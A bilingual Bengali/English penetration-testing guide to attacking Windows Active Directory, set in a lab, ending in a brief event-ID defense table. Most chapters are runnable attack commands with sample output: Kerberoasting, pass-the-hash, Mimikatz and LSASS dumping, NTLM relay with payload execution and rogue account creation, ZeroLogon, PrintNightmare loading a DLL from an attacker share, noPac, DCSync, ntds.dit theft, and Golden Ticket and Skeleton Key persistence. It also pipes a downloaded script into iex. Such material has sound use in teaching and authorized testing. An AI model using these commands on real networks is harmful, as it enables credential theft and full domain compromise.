🏰

Active Directory Attack

Windows AD Penetration Testing — সম্পূর্ণ বাংলা গাইডWindows AD Penetration Testing — Complete Guide

AD Enumeration থেকে শুরু করে Kerberoasting, Pass-the-Hash, DCSync, Golden Ticket — Active Directory Attack-এর সব কিছু এক জায়গায়।From AD Enumeration to Kerberoasting, Pass-the-Hash, DCSync, Golden Ticket — everything about Active Directory attacks in one place.

attacker@kali:~# GetNPUsers.py corp.local/ -usersfile users.txt
$krb5asrep$23$john@CORP.LOCAL:a3f8b...
attacker@kali:~# hashcat -m 18200 hash.txt rockyou.txt
john@CORP.LOCAL : Password123!
🔍 AD Enumeration 🎫 Kerberos Attacks 🔑 Pass-the-Hash 👑 DCSync 🏆 Golden Ticket ⬆️ Privilege Escalation 🌐 Lateral Movement 🛡️ Defense & Detection 🗺️ Roadmap
📋 বিষয়সূচিTable of Contents
০১ Active Directory পরিচিতিIntroduction
AD কী, Domain, DC, Forest, Trust, KerberosWhat is AD, Domain, DC, Forest, Trust, Kerberos
০২ Lab Setup
Windows Server, Kali, vulnerable AD lab তৈরিSetting up Windows Server, Kali, vulnerable AD lab
০৩ AD Enumeration
BloodHound, PowerView, ldapsearch, enum4linux
User, Group, GPO, ACL — সব তথ্য সংগ্রহCollecting User, Group, GPO, ACL information
০৪ Kerberos Attacks
AS-REP Roasting, Kerberoasting, Overpass-the-Hash
Pass-the-Ticket, Silver Ticket, Golden Ticket
০৫ Credential Attacks
Pass-the-Hash, Pass-the-Password, NTLM Relay
Mimikatz, secretsdump, LSASS dump
০৬ Lateral Movement
WMI, PSExec, SMB, WinRM — নেটওয়ার্কে ছড়ানোSpreading across the network
০৭ Domain Privilege Escalation
ACL Abuse, AS-REP, Unconstrained Delegation
PrintNightmare, ZeroLogon, noPac
০৮ Domain Compromise
DCSync, ntds.dit dump, Golden Ticket, Diamond Ticket
০৯ Defense ও DetectionDefense & Detection
Windows Event Logs, Tiering Model, Hardening
১০ Cheat Sheet & Roadmap
সব গুরুত্বপূর্ণ কমান্ড ও শেখার পথAll important commands and the learning path
CHAPTER 01
🏰 Active Directory পরিচিতিIntroduction
Windows Enterprise Network-এর মূল ভিত্তি বোঝোUnderstand the core foundation of Windows Enterprise Networks

Active Directory কী?What is Active Directory?

Active Directory (AD) হলো Microsoft-এর directory service যা Windows domain network-এ user, computer, policy সব কিছু centrally manage করে। ৯০%+ enterprise network-এ AD আছে — তাই AD হ্যাক করতে পারলে পুরো organization compromise হয়।Active Directory (AD) is Microsoft's directory service that centrally manages users, computers, and policies in Windows domain networks. Over 90% of enterprise networks use AD — so hacking AD can compromise the entire organization.

AD মূল উপাদানCore Components

AD Forest: corp.local
│
├── Domain: corp.local
│    ├── Domain Controller (DC)সবচেয়ে গুরুত্বপূর্ণ target!
│    │    └── ntds.dit (সব user hash এখানে!)
│    ├── Users: john, alice, svc_sql...
│    ├── Computers: WS01, SERVER01...
│    ├── Groups: Domain Admins, IT, HR...
│    ├── OUs: Computers, Users, Servers...
│    └── GPOs: Password Policy, Scripts...
│
└── Child Domain: dev.corp.local (Trust relationship)

Kerberos (Port 88) — Authentication Protocol
LDAP (Port 389/636) — Directory Query
SMB (Port 445) — File/Service Access
RPC (Port 135) — Remote Procedure Call

গুরুত্বপূর্ণ সংজ্ঞাImportant Definitions

শব্দTermমানেMeaningSecurity গুরুত্বSecurity Importance
Domain Controller (DC)সব authentication পরিচালনা করেManages all authenticationCRITICAL TARGET
ntds.ditAD database — সব user hash এখানেAD database — all user hashes hereCRITICAL
KRBTGTKerberos ticket তৈরির accountAccount for creating Kerberos ticketsGolden Ticket!
Domain Adminসর্বোচ্চ privilege groupHighest privilege groupUltimate goal
Service AccountService চালানোর জন্য accountAccount for running servicesKerberoast target
ACL/ACEAccess Control — কে কী করতে পারেAccess Control — who can do whatAbuse করা যায়
GPOGroup Policy — সব machine-এ applyGroup Policy — applies to all machinesPersistence
SPNService Principal NameService Principal NameKerberoast signal

Kerberos Authentication — কীভাবে কাজ করে?How Does It Work?

Client              KDC (DC)                    Service

1. AS-REQ ──────────►
   (username + timestamp,
    encrypted w/ password hash)

              ◄──── 2. AS-REP
                       TGT (Ticket Granting Ticket)
                       encrypted w/ KRBTGT hash

3. TGS-REQ ──────────►
   (TGT + SPN request)

              ◄──── 4. TGS-REP
                       Service Ticket
                       encrypted w/ Service Account hash
                       ← Kerberoast এখানে! (offline crack)

5. AP-REQ ──────────────────────────────────►
   (Service Ticket)

                              ◄────────────── 6. Access!

AD Attack Kill Chain

🔍
Recon
Enum users, shares
👤
Initial Access
Low-priv user
🎫
Credential
Kerberoast, PTH
🌐
Lateral Move
WMI, PSExec
⬆️
PrivEsc
ACL abuse, CVE
👑
DA / DCSync
Domain Admin!
⚠️ গুরুত্বপূর্ণ সতর্কতাImportant Warning
AD attack শুধুমাত্র নিজের lab বা authorized pentest-এ। Real organization-এ অনুমতি ছাড়া করলে Computer Fraud and Abuse Act-এর অধীনে আইনি সমস্যা হবে। AD attacks are only for your own lab or authorized pentests. Doing this on real organizations without permission is illegal under the Computer Fraud and Abuse Act.

🏰 AD মনে রাখোRemember

  • ✅ DC = সবচেয়ে গুরুত্বপূর্ণ target — এটা হ্যাক হলে সব শেষMost important target — if this is hacked, it's all over
  • ✅ KRBTGT hash → Golden Ticket → যেকোনো user হওয়া যায়can become any user
  • ✅ Kerberos → TGT → Service Ticket → SPN থাকলে Kerberoast!If SPN exists, Kerberoast!
  • ✅ Kill Chain: Recon → Credential → Lateral → PrivEsc → DA
CHAPTER 02
🔧 Lab Setup
নিজের AD lab তৈরি করো — Vulnerable-AD দিয়ে সহজেBuild your own AD lab — easy with Vulnerable-AD

Lab ArchitectureLab Architecture

VMware / VirtualBox — Host-only Network: 192.168.56.0/24

┌──────────────────────────────────────────────────────┐
│                                                      │
│  ┌─────────────────┐    ┌─────────────────────────┐ │
│  │ Windows Server  │    │   Kali Linux            │ │
│  │ 2019 / 2022     │    │   (Attacker)            │ │
│  │ 192.168.56.10   │    │   192.168.56.20         │ │
│  │                 │    │                         │ │
│  │ ● Domain: corp  │    │ ● impacket              │ │
│  │ ● DC role       │    │ ● BloodHound            │ │
│  │ ● AD DS         │    │ ● CrackMapExec          │ │
│  │ ● Users: 10+    │    │ ● PowerView             │ │
│  └─────────────────┘    └─────────────────────────┘ │
│                                                      │
│  ┌─────────────────┐                                │
│  │ Windows 10 VM   │                                │
│  │ 192.168.56.11   │  (Victim Workstation)          │
│  │ Domain joined   │                                │
│  └─────────────────┘                                │
└──────────────────────────────────────────────────────┘

Vulnerable-AD — সহজ Lab SetupEasy Lab Setup

# Vulnerable-AD: https://github.com/WazeHell/vulnerable-AD # Windows Server 2019-এ PowerShell (Admin) চালাও: # 1. Windows Server 2019 VM তৈরি করো # 2. Evaluation version: eval.center থেকে ISO নাও # 3. PowerShell (Admin): Set-ExecutionPolicy Unrestricted -Force iex ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/WazeHell/vulnerable-AD/master/vulnad.ps1')) Invoke-VulnAD -UsersLimit 100 -Domain "corp.local" # এটা automatically তৈরি করবে: # ✓ AD Domain: corp.local # ✓ 100 random user # ✓ Kerberoastable accounts (SPN set) # ✓ AS-REP Roastable accounts # ✓ Misconfigured ACLs # ✓ Weak passwords # Alternative: GOAD (Game of Active Directory) # https://github.com/Orange-Cyberdefense/GOAD # Vagrant + VirtualBox দিয়ে বড় lab

Kali Linux টুল ইনস্টলTool Installation

# Essential AD attack tools: sudo apt update && sudo apt install -y \ bloodhound neo4j \ impacket-scripts \ crackmapexec \ evil-winrm \ ldap-utils \ smbclient \ enum4linux \ kerbrute # Python tools: pip3 install impacket bloodhound # BloodHound setup: sudo neo4j start bloodhound & # → http://localhost:7474 → neo4j/neo4j → change password # Default: neo4j / neo4j # /etc/hosts-এ DC যোগ করো: echo "192.168.56.10 dc01.corp.local corp.local" | sudo tee -a /etc/hosts # DNS set করো: sudo resolvectl dns eth0 192.168.56.10

🔧 Lab Setup মনে রাখোRemember

  • ✅ Vulnerable-AD → সহজে intentionally vulnerable lab তৈরিEasily create an intentionally vulnerable lab
  • ✅ BloodHound + neo4j → AD visualize করার সেরা toolBest tool for visualizing AD
  • ✅ impacket → সব Python-based AD attack toolAll Python-based AD attack tools
  • ✅ /etc/hosts → Domain name resolve করার জন্যFor resolving domain names
CHAPTER 03
🔍 AD Enumeration
তথ্য সংগ্রহ — attack-এর সবচেয়ে গুরুত্বপূর্ণ ধাপInformation gathering — the most important step of an attack

Unauthenticated Enumeration — Login ছাড়াইUnauthenticated Enumeration — Without Login

# নেটওয়ার্ক স্ক্যান nmap -sV -p 88,135,139,389,445,464,636,3268,3389 192.168.56.10 nmap --script ldap-rootdse -p 389 192.168.56.10 # LDAP info nmap --script smb-enum-shares -p 445 192.168.56.10 # SMB shares # enum4linux — SMB/LDAP enumeration enum4linux -a 192.168.56.10 enum4linux -u "" -p "" -a 192.168.56.10 # Null session # smbclient — Shares দেখো smbclient -L //192.168.56.10 -N # Null session smbclient //192.168.56.10/SYSVOL -N # SYSVOL access # Kerbrute — Valid username খোঁজো (AS-REQ) kerbrute userenum --dc 192.168.56.10 -d corp.local usernames.txt # → john@corp.local - VALID # → alice@corp.local - VALID

BloodHound — AD Map তৈরি করোCreate an AD Map

# BloodHound Collector (SharpHound) চালাও: # Windows-এ (domain user হিসেবে): .\SharpHound.exe -c All --zipfilename bloodhound_data.zip # Linux-এ (bloodhound-python): pip3 install bloodhound bloodhound-python -d corp.local -u john -p Password123 \ -dc dc01.corp.local -c All --zip # BloodHound UI-তে data import করো: # Upload Data → ZIP file select করো # Useful BloodHound Queries: # "Find all Domain Admins" # "Shortest Path to Domain Admins" # "Find Principals with DCSync Rights" # "Find Kerberoastable Users" # "Find AS-REP Roastable Users" # "Find Computers with Unconstrained Delegation"

PowerView / LDAP — বিস্তারিত EnumerationDetailed Enumeration

# PowerView (Windows domain machine-এ): Import-Module .\PowerView.ps1 ══ Domain Info ══ Get-NetDomain # Domain info Get-NetDomainController # DC list Get-DomainPolicy # Password policy (Get-DomainPolicy)."SystemAccess" # Min password length etc. ══ User Enumeration ══ Get-NetUser # সব user Get-NetUser -Username john # নির্দিষ্ট user Get-NetUser | select samaccountname, description # ⭐ Password in description! Get-NetUser -SPN # Kerberoastable users! Get-NetUser -PreauthNotRequired # AS-REP Roastable! ══ Group Enumeration ══ Get-NetGroup "Domain Admins" # DA members Get-NetGroupMember "Domain Admins" Get-NetLocalGroup -ComputerName WS01 # Local admins ══ Computer Enumeration ══ Get-NetComputer # সব computer Get-NetComputer -OperatingSystem "*Server*" Get-NetComputer -Unconstrained # Unconstrained delegation! ══ Share Enumeration ══ Find-DomainShare # সব share Find-InterestingDomainShareFile # Interesting files Invoke-ShareFinder # Accessible shares ══ ACL Enumeration ══ Get-ObjectAcl -SamAccountName john -ResolveGUIDs # john-এর ACL Find-InterestingDomainAcl -ResolveGUIDs # ⭐ Abuseable ACLs!

CrackMapExec — Swiss Army KnifeSwiss Army Knife

# CrackMapExec (CME) — network-wide enumeration crackmapexec smb 192.168.56.0/24 # Network discovery crackmapexec smb 192.168.56.10 -u "" -p "" --shares # Null session shares crackmapexec smb 192.168.56.10 -u john -p Password123 --shares crackmapexec smb 192.168.56.10 -u john -p Password123 --users crackmapexec smb 192.168.56.10 -u john -p Password123 --groups crackmapexec smb 192.168.56.10 -u john -p Password123 --loggedon-users crackmapexec smb 192.168.56.10 -u john -p Password123 --pass-pol # Password policy # LDAP দিয়ে: crackmapexec ldap 192.168.56.10 -u john -p Password123 --bloodhound -c All crackmapexec ldap 192.168.56.10 -u john -p Password123 --kerberoasting kerberoast.txt crackmapexec ldap 192.168.56.10 -u john -p Password123 --asreproast asrep.txt

🔍 Enumeration মনে রাখোRemember

  • ✅ BloodHound → AD visualize করো, attack path খোঁজোVisualize AD, find attack paths
  • Get-NetUser | select descriptionPassword in description!Password in description!
  • Get-NetUser -SPN → Kerberoast target | -PreauthNotRequired → AS-REP target
  • ✅ CME → Network-wide দ্রুত enumerationQuick network-wide enumeration
CHAPTER 04
🎫 Kerberos Attacks
AS-REP Roasting, Kerberoasting, Golden Ticket — সবচেয়ে শক্তিশালী AD attackAS-REP Roasting, Kerberoasting, Golden Ticket — the most powerful AD attacks

AS-REP Roasting — Pre-auth disabled userPre-auth Disabled User

# Pre-authentication disabled থাকলে → Password জানা ছাড়াই hash পাওয়া যায়! # User attribute: DONT_REQ_PREAUTH set থাকলে vulnerable # impacket — GetNPUsers.py: GetNPUsers.py corp.local/ -dc-ip 192.168.56.10 -usersfile users.txt -no-pass GetNPUsers.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request # Output: $krb5asrep$23$alice@CORP.LOCAL:3f8a2b... ← crack করো! # CrackMapExec: crackmapexec ldap dc01.corp.local -u john -p Password123 --asreproast asrep.txt # Hash crack করো: hashcat -m 18200 asrep.txt rockyou.txt hashcat -m 18200 asrep.txt rockyou.txt --force john --format=krb5asrep asrep.txt --wordlist=rockyou.txt # PowerView দিয়ে AS-REP vulnerable user খোঁজো: Get-NetUser -PreauthNotRequired | select samaccountname

Kerberoasting — Service Account Hash চুরিStealing Service Account Hashes

# SPN (Service Principal Name) set থাকা account-কে Service Ticket request করো # Service Ticket service account-এর hash দিয়ে encrypt → Offline crack! # impacket — GetUserSPNs.py: GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request -outputfile kerberoast.txt # Output: $krb5tgs$23$*svc_sql$CORP.LOCAL$corp.local/svc_sql*$2ac8... ← crack! # CrackMapExec: crackmapexec ldap dc01.corp.local -u john -p Password123 --kerberoasting kerberoast.txt # PowerShell (Windows, Rubeus): .\Rubeus.exe kerberoast /outfile:kerberoast.txt # Hash crack: hashcat -m 13100 kerberoast.txt rockyou.txt # RC4 (most common) hashcat -m 19600 kerberoast.txt rockyou.txt # AES256 john --format=krb5tgs kerberoast.txt --wordlist=rockyou.txt

Pass-the-Ticket (PTT)

# TGT বা Service Ticket চুরি করে use করা # Rubeus (Windows): .\Rubeus.exe dump /nowrap # সব ticket dump .\Rubeus.exe tgtdeleg /nowrap # TGT extract .\Rubeus.exe ptt /ticket:BASE64_TICKET # Ticket inject # impacket — ticketer.py: # TGT inject করো: export KRB5CCNAME=/tmp/john.ccache psexec.py -k -no-pass corp.local/john@dc01.corp.local

Golden Ticket — সর্বোচ্চ AccessUltimate Access

👑 Golden Ticket — সবচেয়ে শক্তিশালী AttackMost Powerful Attack
KRBTGT account-এর NTLM hash পেলে যেকোনো user (এমনকি non-existent user) হিসেবে যেকোনো service access করা যায়। Domain reset না করলে Golden Ticket কাজ করতে থাকে! With the KRBTGT account's NTLM hash, you can access any service as any user (even non-existent ones). Golden Ticket keeps working until the domain is reset!
# Golden Ticket তৈরির জন্য দরকার: # 1. Domain name: corp.local # 2. Domain SID: S-1-5-21-... # 3. KRBTGT NTLM hash # Domain SID বের করো: Get-DomainSID # PowerView whoami /user # Windows lookupsid.py corp.local/john:Password123@dc01.corp.local 0 # impacket # KRBTGT hash বের করো (DA privilege লাগবে): secretsdump.py corp.local/Administrator:Admin123@dc01.corp.local # DCSync # → krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a94f57ec31d1b9... # Golden Ticket তৈরি ও inject — impacket: ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local backdoor_admin export KRB5CCNAME=backdoor_admin.ccache psexec.py -k -no-pass corp.local/backdoor_admin@dc01.corp.local # Mimikatz (Windows): kerberos::golden /user:backdoor /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt misc::cmd # Shell with golden ticket

🎫 Kerberos Attack মনে রাখোRemember

  • ✅ AS-REP Roast → Pre-auth disabled → GetNPUsers.py → hashcat -m 18200
  • ✅ Kerberoast → SPN set → GetUserSPNs.py → hashcat -m 13100
  • ✅ Golden Ticket → KRBTGT hash → সব কিছু access!Access everything!
  • এই দুটো attack-ই low-privilege user দিয়েই করা যায়Both attacks can be done with a low-privilege user
CHAPTER 05
🔑 Credential Attacks
Password না জেনেই Hash দিয়ে authenticate — PTH, NTLM Relay, MimikatzAuthenticate with a Hash without knowing the password — PTH, NTLM Relay, Mimikatz

Pass-the-Hash (PTH)

# NTLM hash পেলে password ছাড়াই authenticate করা যায়! # Hash format: LM:NT (aad3b435b51404eeaad3b435b51404ee:NTLM_HASH) # impacket — psexec, smbexec, wmiexec: psexec.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH smbexec.py corp.local/Administrator@192.168.56.10 -hashes aad3...:NTLM_HASH wmiexec.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH # CrackMapExec PTH: crackmapexec smb 192.168.56.0/24 -u Administrator -H NTLM_HASH crackmapexec smb 192.168.56.10 -u Administrator -H NTLM_HASH --exec-method wmiexec -x "whoami" # evil-winrm PTH: evil-winrm -i 192.168.56.10 -u Administrator -H NTLM_HASH # Mimikatz (Windows) — sekurlsa::pth sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe

Mimikatz — Credential ExtractionCredential Extraction

# Mimikatz: https://github.com/gentilkiwi/mimikatz # LSASS থেকে plaintext password ও hash বের করে privilege::debug # Debug privilege (Admin দরকার) sekurlsa::logonpasswords # ⭐⭐⭐ সব logged-in user-এর credential! sekurlsa::wdigest # WDigest plaintext (old Windows) sekurlsa::tickets # Kerberos tickets sekurlsa::krbtgt # KRBTGT session key lsadump::sam # Local SAM database lsadump::lsa /patch # LSA secrets lsadump::dcsync /user:krbtgt # DCSync! # LSASS dump → offline analysis: # Task Manager → Details → lsass.exe → Right-click → Create dump file # Procdump: .\procdump.exe -accepteula -ma lsass.exe lsass.dmp # Dump analysis (Kali-তে): pypykatz lsa minidump lsass.dmp # pip3 install pypykatz

NTLM Relay Attack

# Responder + ntlmrelayx — MITM credential capture # ধাপ 1: Responder চালাও (NBT-NS/LLMNR poison): sudo responder -I eth0 -rdwv # SMB/HTTP বন্ধ রাখো (-S -F): sudo responder -I eth0 -rdwv -S -F # ধাপ 2: ntlmrelayx চালাও (impacket): ntlmrelayx.py -tf targets.txt -smb2support ntlmrelayx.py -tf targets.txt -smb2support -i # Interactive SMB shell ntlmrelayx.py -tf targets.txt -smb2support -e shell.exe # Execute payload ntlmrelayx.py -tf targets.txt -smb2support -c "net user hacker P@ss /add /domain" # ধাপ 3: victim যখন \\FAKE_HOST-এ connect করে → hash relay হয় # Mitigation: SMB Signing enable করো (Relay কাজ করবে না) crackmapexec smb 192.168.56.0/24 --gen-relay-list targets.txt # Signing disabled hosts

secretsdump — Remote Credential DumpRemote Credential Dump

# impacket — secretsdump.py # Remote credential dump (Admin access দরকার): secretsdump.py corp.local/Administrator:Admin123@192.168.56.10 secretsdump.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH # Output: corp.local\Administrator:500:aad3...:8846f7eaee8fb117... corp.local\john:1104:aad3...:3dbde697d71690a769204... krbtgt:502:aad3...:a94f57ec31d1b96ce13abb789... ← Golden Ticket! # ntds.dit থেকে (local): secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

🔑 Credential Attack মনে রাখোRemember

  • ✅ Pass-the-Hash → psexec.py -hashes :NTLM_HASH
  • ✅ Mimikatz → sekurlsa::logonpasswordsplaintext + hashplaintext + hash
  • ✅ NTLM Relay → Responder + ntlmrelayx → SMB signing off হলে কাজ করেWorks when SMB signing is off
  • ✅ secretsdump.py → Remote hash dump — Admin access লাগেRemote hash dump — needs Admin access
CHAPTER 06
🌐 Lateral Movement
নেটওয়ার্কে একটা machine থেকে অন্যটায় যাওয়ার কৌশলTechniques for moving from one machine to another in the network

Lateral Movement পদ্ধতিLateral Movement Methods

══════════ PSExec (SMB) ══════════ psexec.py corp.local/Administrator:Admin123@192.168.56.11 psexec.py corp.local/Administrator@192.168.56.11 -hashes :NTLM_HASH # Port 445 (SMB) + Admin share দরকার ══════════ WMIExec ══════════ wmiexec.py corp.local/Administrator:Admin123@192.168.56.11 wmiexec.py corp.local/Administrator@192.168.56.11 -hashes :NTLM_HASH # Port 135 (WMI) ══════════ SMBExec ══════════ smbexec.py corp.local/Administrator:Admin123@192.168.56.11 # Noisier than wmiexec ══════════ WinRM (5985) ══════════ evil-winrm -i 192.168.56.11 -u Administrator -p Admin123 evil-winrm -i 192.168.56.11 -u Administrator -H NTLM_HASH # PowerShell remoting ══════════ CrackMapExec ══════════ crackmapexec smb 192.168.56.0/24 -u Administrator -p Admin123 # Password spray crackmapexec smb 192.168.56.0/24 -u Administrator -H NTLM_HASH # PTH spray crackmapexec smb 192.168.56.0/24 -u Administrator -p Admin123 -x "ipconfig" # Execute ══════════ RDP (3389) ══════════ xfreerdp /v:192.168.56.11 /u:Administrator /p:Admin123 xfreerdp /v:192.168.56.11 /u:Administrator /pth:NTLM_HASH # Restricted Admin mode

PowerShell Remoting

# PowerShell দিয়ে remote execution (WS-Management) # Remote session তৈরি: $session = New-PSSession -ComputerName WS01 -Credential corp\Administrator Enter-PSSession -ComputerName WS01 -Credential corp\Administrator # Shell খুলবে: [WS01]: PS C:\> # Remote command চালাও: Invoke-Command -ComputerName WS01 -ScriptBlock {whoami; hostname} Invoke-Command -ComputerName WS01 -Credential $cred -ScriptBlock {ipconfig} # Script চালাও: Invoke-Command -ComputerName WS01 -FilePath .\payload.ps1 # impacket — atexec.py (Scheduled Task): atexec.py corp.local/Administrator:Admin123@192.168.56.11 "whoami"

Token Impersonation — Privilege চুরিToken Impersonation — Stealing Privileges

# Windows Token: প্রতিটি process-এর identity # Domain Admin যদি machine-এ login থাকে → Token impersonate করো! # Incognito (Metasploit): meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token "CORP\\Administrator" # Rubeus — Token: .\Rubeus.exe triage # সব Kerberos ticket দেখো .\Rubeus.exe dump /nowrap /luid:0x3e4 # নির্দিষ্ট token dump # Metasploit getsystem: meterpreter > getsystem # Token impersonation দিয়ে SYSTEM

🌐 Lateral Movement মনে রাখোRemember

  • ✅ WMIExec → সবচেয়ে কম noisyLeast noisy
  • ✅ evil-winrm → WinRM (5985) → সহজ interactive shellEasy interactive shell
  • ✅ CME → network-wide spray, দ্রুতNetwork-wide spray, fast
  • ✅ Token impersonation → DA machine-এ থাকলে → DA হওয়া যায়If DA is on the machine → become DA
CHAPTER 07
⬆️ Domain Privilege Escalation
Low-priv থেকে Domain Admin হওয়ার পথThe path from low-privilege to Domain Admin

ACL Abuse — Permission MisconfigurationPermission Misconfiguration

# Dangerous AD Rights: GenericAll # → Full control! Password reset, add to group GenericWrite # → Write any attribute → SPN set করো → Kerberoast! WriteOwner # → Object owner হওয়া যায় WriteDACL # → DCSync rights দেওয়া যায়! ForceChangePassword # → Password change করো AllExtendedRights # → Including ForceChangePassword AddMember # → Group-এ add করো Self # → নিজেকে group-এ add করো # GenericAll on User → Password Reset: Set-DomainUserPassword -Identity alice -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force) -Verbose # GenericAll on Group → Member Add: Add-DomainGroupMember -Identity "Domain Admins" -Members john -Verbose # GenericWrite → Targeted Kerberoasting: Set-DomainObject -Identity alice -Set @{serviceprincipalname='nonexistent/BLAH'} # এখন alice-কে kerberoast করো! GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request # WriteDACL → DCSync rights দাও: Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \ -PrincipalIdentity john \ -Rights DCSync -Verbose # এখন john দিয়ে DCSync করো!

Unconstrained Delegation

# Unconstrained Delegation: Computer বা Service যেকোনো service-এ user-এর হয়ে যেতে পারে # Vulnerable computer-এ যদি DA connect করে → TGT পাওয়া যায়! # Unconstrained delegation computer খোঁজো: Get-NetComputer -Unconstrained | select samaccountname # DC ছাড়া অন্য machine থাকলে vulnerable! # Printer Bug (SpoolSample) দিয়ে DA force করো: # DC-কে vulnerable machine-এ connect করাও → TGT capture! .\SpoolSample.exe DC01 COMPROMISED_MACHINE # Rubeus দিয়ে TGT monitor করো: .\Rubeus.exe monitor /interval:5 /nowrap # → DC01$-এর TGT পাওয়া গেছে → DCSync!

Critical CVEs — AD Privilege EscalationAD Privilege Escalation

ZeroLogon (CVE-2020-1472)
CRITICAL — CVSS 10.0

Netlogon authentication bypass — DC-র machine account password শূন্য করা যায়, তারপর DCSync!Netlogon authentication bypass — can zero out DC machine account password, then DCSync!

cve-2020-1472-exploit.py -n DC01 -t 192.168.56.10
PrintNightmare (CVE-2021-1675)
CRITICAL

Print Spooler service-এ RCE → SYSTEM privilege। Low-priv user দিয়ে DA হওয়া যায়।RCE in Print Spooler service → SYSTEM privilege. Low-priv user can become DA.

CVE-2021-1675.py corp.local/john:Pass@dc01 '\\attacker\share\shell.dll'
noPac (CVE-2021-42278/42287)
CRITICAL

Domain user → Domain Admin in one step! Machine account name manipulation।Domain user → Domain Admin in one step! Machine account name manipulation.

noPac.py corp.local/john:Pass -dc-ip 192.168.56.10 --impersonate Administrator -dump
PetitPotam (CVE-2021-36942)
HIGH

NTLM coercion — DC-কে attacker-এর কাছে connect করানো → NTLM relay → DA!NTLM coercion — force DC to connect to attacker → NTLM relay → DA!

PetitPotam.py attacker_ip dc_ip

⬆️ Domain PrivEsc মনে রাখোRemember

  • ✅ BloodHound → "Shortest Path to DA" — attack path খোঁজো"Shortest Path to DA" — find attack path
  • ✅ GenericAll → Password reset | GenericWrite → Kerberoast | WriteDACL → DCSync
  • ✅ ZeroLogon, noPac → Patch করা না থাকলে → DA এক ধাপেই!If unpatched → DA in one step!
  • Find-InterestingDomainAclAbuseable ACL খোঁজোFind abuseable ACLs
CHAPTER 08
👑 Domain Compromise
DCSync, ntds.dit dump, Golden Ticket — সম্পূর্ণ Domain controlDCSync, ntds.dit dump, Golden Ticket — complete Domain control

DCSync — Domain Replication AttackDomain Replication Attack

# DCSync: DC-র Replication API abuse করে সব hash বের করা # Requires: Domain Admin OR DCSync rights (WriteDACL দিয়ে দেওয়া যায়) # impacket — secretsdump.py (সবচেয়ে সহজ): secretsdump.py corp.local/Administrator:Admin123@192.168.56.10 secretsdump.py corp.local/Administrator@192.168.56.10 -hashes :NTLM_HASH # নির্দিষ্ট user: secretsdump.py corp.local/Administrator:Admin123@dc01.corp.local -just-dc-user krbtgt secretsdump.py corp.local/Administrator:Admin123@dc01.corp.local -just-dc-ntlm # Output: corp.local\Administrator:500:aad3...:8846f7eaee8fb117ad06bdd830b7586c corp.local\krbtgt:502:aad3...:a94f57ec31d1b96ce13abb789f4db0d0 ← Golden Ticket! corp.local\john:1104:aad3...:3dbde697d71690a769204beb12283678 # Mimikatz DCSync: lsadump::dcsync /domain:corp.local /user:krbtgt lsadump::dcsync /domain:corp.local /all /csv

ntds.dit — সব Hash এক ফাইলেAll Hashes in One File

# ntds.dit = AD database (C:\Windows\NTDS\ntds.dit) # SYSTEM hive-ও দরকার (encryption key) # Volume Shadow Copy দিয়ে copy (DC-তে Admin হিসেবে): vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit reg save HKLM\SYSTEM C:\temp\SYSTEM # ntdsutil দিয়ে: ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q # impacket দিয়ে local parse: secretsdump.py -ntds C:\temp\ntds.dit -system C:\temp\SYSTEM LOCAL secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL # সব hash crackmapexec দিয়ে crack করো: crackmapexec smb 192.168.56.10 -u Administrator -H NTLM_HASH --sam

Persistence — DA access ধরে রাখাMaintaining DA Access

# Golden Ticket (KRBTGT hash পেলে — 10 বছরের জন্য!): ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... \ -domain corp.local -duration 3650 backdoor_admin # Silver Ticket (Service account hash — নির্দিষ্ট service): ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... \ -domain corp.local -spn cifs/dc01.corp.local backdoor_user # Diamond Ticket (Golden Ticket-এর উন্নত version): ticketer.py -request -domain corp.local/john:Pass123 \ -nthash KRBTGT_HASH -aesKey AES_KEY -domain-sid S-1-5-21-... \ -user-id 500 Administrator # Skeleton Key (DC-তে — যেকোনো user "mimikatz" password দিয়ে login): misc::skeleton # Mimikatz — DC-তে চালাও # Password: "mimikatz" # AdminSDHolder abuse (Persistence): Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=corp,DC=local' \ -PrincipalIdentity john -Rights All -Verbose # SDProp run হলে john-এর permission সব privileged group-এ propagate হবে! # Rogue DC — DCShadow (Stealth): # Mimikatz lsadump::dcshadow — fake DC register করো

👑 Domain Compromise মনে রাখোRemember

  • ✅ DCSync → secretsdump.pyসব hash — DA অথবা DCSync rights লাগবেAll hashes — needs DA or DCSync rights
  • ✅ ntds.dit → Shadow Copy → Offline parse, সব hashOffline parse, all hashes
  • ✅ Golden Ticket → KRBTGT hash → ৩৬৫০ দিনের ticket — পুরো domain control!3650-day ticket — full domain control!
  • KRBTGT password দুইবার reset করো — Golden Ticket invalidate!Reset KRBTGT password twice — Golden Ticket invalidated!
CHAPTER 09
🛡️ Defense & Detection
AD হার্ডেনিং ও Attack Detection — Blue Team GuideAD Hardening and Attack Detection — Blue Team Guide

গুরুত্বপূর্ণ Windows Event IDsImportant Windows Event IDs

Event IDকী ঘটেছেWhat Happenedআক্রমণAttack
4625Login failedLogin failedBrute Force
4648Explicit credential loginExplicit credential loginPass-the-Hash
4672Special privilege assignedSpecial privilege assignedPrivilege Escalation
4688New process createdNew process createdMalicious execution
4698Scheduled task createdScheduled task createdPersistence
